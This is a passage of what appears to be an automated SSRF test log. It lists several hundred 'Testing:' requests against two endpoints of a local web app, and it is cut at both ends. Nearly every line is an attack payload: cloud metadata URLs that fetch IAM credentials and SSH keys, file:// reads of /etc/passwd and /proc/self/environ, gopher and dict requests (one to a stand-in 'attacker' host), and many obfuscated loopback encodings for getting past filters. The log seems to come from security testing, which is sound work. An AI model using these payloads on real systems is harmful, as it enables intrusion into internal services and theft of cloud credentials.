`http://localhost:4200/api/internal?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/internal?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/internal?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/internal?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/internal?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/internal?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/internal?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/internal?url=3232235521` +- Testing: `http://localhost:4200/api/internal?url=3232235777` +- Testing: `http://localhost:4200/api/internal?url=425.510.425.510` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/internal?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/internal?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/internal?url=instance-data` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A22` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A443` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/internal?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/internal?url=loopback` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A22` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A80` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A443` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/internal?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/internal?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/internal?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/internal?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/internal?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/internal?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/internal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/internal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/internal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/internal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/internal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/internal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/internal?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/internal?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/internal?url=0%2F` +- Testing: `http://localhost:4200/api/internal?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/logs +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/logs?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/logs?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/logs?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/logs?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/logs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=0` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/logs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/logs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/logs?url=2130706433` +- Testing: `http://localhost:4200/api/logs?url=017700000001` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001` +- Testing: `http://localhost:4200/api/logs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/logs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/logs?url=google.com.localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/logs?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/logs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/logs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/logs?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/logs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/logs?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/logs?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=0%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.1` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/logs?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/logs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/logs?url=0` +- Testing: `http://localhost:4200/api/logs?url=127.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.1` +- Testing: `http://localhost:4200/api/logs?url=localhost` +- Testing: `http://localhost:4200/api/logs?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/logs?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/logs?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/logs?url=7F000001` +- Testing: `http://localhost:4200/api/logs?url=2130706433` +- Testing: `http://localhost:4200/api/logs?url=6425673729` +- Testing: `http://localhost:4200/api/logs?url=127001` +- Testing: `http://localhost:4200/api/logs?url=127_0._0_1` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/logs?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/logs?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001` +- Testing: `http://localhost:4200/api/logs?url=017700000001` +- Testing: `http://localhost:4200/api/logs?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/logs?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/logs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/logs?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/logs?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254` +- Testing: `http://localhost:4200/api/logs?url=2852039166` +- Testing: `http://localhost:4200/api/logs?url=7147006462` +- Testing: `http://localhost:4200/api/logs?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/logs?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/logs?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/logs?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: 